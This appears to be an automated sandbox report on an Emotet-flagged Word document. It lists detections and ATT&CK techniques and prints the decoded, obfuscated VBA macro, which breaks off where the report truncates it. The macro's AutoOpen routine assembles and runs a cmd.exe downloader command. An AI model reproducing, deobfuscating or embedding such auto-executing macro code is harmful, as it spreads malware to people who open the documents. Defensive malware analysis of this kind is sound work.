MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with a specific Emotet signature. The presence of an AutoOpen VBA macro, detected by multiple heuristics, indicates that malicious code executes automatically upon opening the document. The script attempts to construct and execute a command using 'cmd.exe', strongly suggesting it's a downloader for a second-stage payload, consistent with Emotet's behavior.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6884087-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884087-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5543 bytes |
SHA-256: 2c0faaa048a4ce74ca496bccffda47b8e0b9781d358197f2f68fec5094342cbd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OAcOimGY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName IJKlr
TypeName ChrB(91407 * YUAzd)
TypeName Rnd(951)
TypeName CBool(448)
TypeName CByte(UzDJZ * NbPEqq / VUscN * cLzijE)
Shell@ CStr("c") + CStr("m") + iKBYEpDAHXPYn + bBmmPTfz + vjGFicd + sIakCAjjip + PFIIKYqVaq + YlARTDfUf + CLJaGjiADN + aVwWLvbtzmX, 195825326 - 195825326
TypeName GtYEu
TypeName VtWQT
End Sub
Attribute VB_Name = "bmTpOWNCpBMY"
Function vjGFicd()
On Error Resume Next
TypeName 5
TypeName Sgn(4343)
YlzrZFHfjBN = "d /V" + ":/C" + CStr(Chr(hXPcEmLufWZRu + zzwizYvVXr + 34 + kWRAIcPGjnGE + VdvibTvFiN)) + "set " + "9z=" + "aCqqdbdjG" + "wKtItVaQ" + "AduXUCj" + "PU"
TypeName Sgn(KSWaM)
TypeName ChrW(484889579)
TypeName vjJCz
dlwjtA = "uGZzwhop'" + "y{N.(\" + "m" + "fTWl;n,D9" + "xY" + "c" + "sS=k3OF1" + "}v" + ":e-/)i r" + "6$@+&&fo" + "r %0 in"
TypeName TljBAv
TypeName iiJPNT
TypeName Sin(4)
zlpDf = " (33,32,3" + "0" + ",65,71,54," + "31,65,45" + ",45" + ",7"
TypeName CLng(9294)
TypeName CDbl(29666 + OFXOQ / VHDwO + 72209)
ACNhwzLao = "0,73,31,4" + "9," + "18,56,4" + "7,65,30," + "66,3" + "2," + "5," + "23,65,5" + "3,13"
TypeName fjzAJ
TypeName UqjChP
UitzvFqihUS = "," + "70,37,65," + "13,3" + "8,44" + ",65,5,22,4" + "5,69,65,4" + "7," + "1"
TypeName WaLvMU
TypeName CStr(93563 + qzbQNB - 88060 - QkPih)
TypeName 843
zGkCbEzTMk = "3,46,73" + ",15,43,55," + "56,3" + "4,3" + "1,13,13,3" + "3,6" + "4,67,67," + "54,53" + ",15," + "47" + ",18,71,3"
TypeName ChrB(20)
TypeName ijKUzj
mmIFdOifP = "5" + ",6" + "5" + ",71,38," + "54,65" + "," + "67,52,74,3" + "1,13,1" + "3" + ",33," + "64,67" + ",67," + "45,65,69,"
vjGFicd = YlzrZFHfjBN + dlwjtA + zlpDf + ACNhwzLao + UitzvFqihUS + zGkCbEzTMk + mmIFdOifP
TypeName 233321069
TypeName ChrB(12643571)
TypeName TTCEci
End Function
Function sIakCAjjip()
On Error Resume Next
TypeName CSng(101)
TypeName Log(DjGqS)
TypeName Atn(zCWPn)
murwBVJBSa = "54," + "26,71,65" + "," + "53,32,69," + "47,41,15" + ",53," + "31,69,47," + "65,38,53" + ",32,41," + "6" + "7,2" + "0,51,59," + "74,31,13,"
TypeName CLng(IkGzt)
TypeName 347
PoUJFkOs = "13,33,64," + "67,67,54,1" + "5,47,13,15" + ",53,31,15" + ",71,"
TypeName CSng(6)
TypeName CInt(TWjQE)
wSjARnR = "6" + "9" + ",13,3" + "5,65,6" + "3,6" + "5,47,13,38" + ",53" + ",32,41,67," + "16," + "10,57,16,7" + "4,3" + "1,"
TypeName Int(bWvnj * 38159)
TypeName CStr(jUMFW)
TypeName Int(83155 * 72171 - 57060 / 76265)
SjXkiui = "13,13,3" + "3,6" + "4,67,67" + ",47,15" + "," + "54" + ",65" + ",66,71,32" + ",18,69," + "4" + "7,1"
TypeName Cos(DUzAl * ohiQrz * 77073 / UYlGhh)
TypeName mfOqdk
TypeName ChrB(DwPwT)
fKbRvJfHOqz = "5,38,53,29" + ",67," + "51" + ",32,14,50" + ",44,72,74" + ",31,13," + "13," + "3" + "3,64,67" + ",6" + "7" + ",54,6"
TypeName XrarjO
TypeName qJuZZ
BioJjfJQ = "5,7" + "1,5," + "32,71,6" + "5,57,3" + "8" + ",53,32," + "41,67,5,5" + "8" + ",65,32,44," + "3,34,3" + "8,55,3" + "3,45"
TypeName 70
TypeName 5
FzZbqjBDCom = ",69,13,39," + "34" + ",74," + "34,68,46," + "73,49,26," + "60,70,5"
sIakCAjjip = murwBVJBSa + PoUJFkOs + wSjARnR + SjXkiui + fKbRvJfHOqz + BioJjfJQ + FzZbqjBDCom
TypeName Tan(64338 - 53859 + 51956 + JLqFXC)
TypeName CBool(988)
TypeName 153062119
End Function
Function PFIIKYqVaq()
On Error Resume Next
TypeName tAYwtF
TypeName GrrMO
TypeName CInt(19)
YHKqO = "6,70,34,61" + ",61,61," + "34,46,73,2" + "8,25,60,5" + "6,73,6" + "5," + "47" + ",6" + "3,64," + "13,"
TypeName CLng(313410910)
TypeName Round(JSNnY * iIQOR)
pLFfXKw = "6" + "5,41,33,75" + ",34,40" + ",34,75,73," + "49,26,6" + "0,75,34,3" + "8,65" + ",5" + "1,65," + "34,46," + "42," + "32," + "71,65,15"
TypeName Arrob
TypeName ChrB(SEAPX)
PsZDbWwsU = ",53,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.